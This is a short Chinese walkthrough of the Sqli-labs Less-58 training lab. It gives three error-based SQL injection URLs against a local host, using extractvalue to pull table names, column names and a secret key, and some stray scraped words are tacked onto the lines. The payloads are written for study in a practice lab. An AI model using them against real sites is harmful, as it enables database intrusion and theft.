Sqli-labs Less-58 报错注入 5次机会

执行sql语句后,并无返回数据库当中的数据,因此咱们这里不能使用union联合注入,这里使用报错注入。可是须要注意这里只有5次机会尝试。sql

找表名 数据库

http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+orm

找列名blog

http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dzgnt6f0xz'),0x7e))--+io

找keytable

http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_GYDQ) from dzgnt6f0xz),0x7e))--+form

相关文章
相关标签/搜索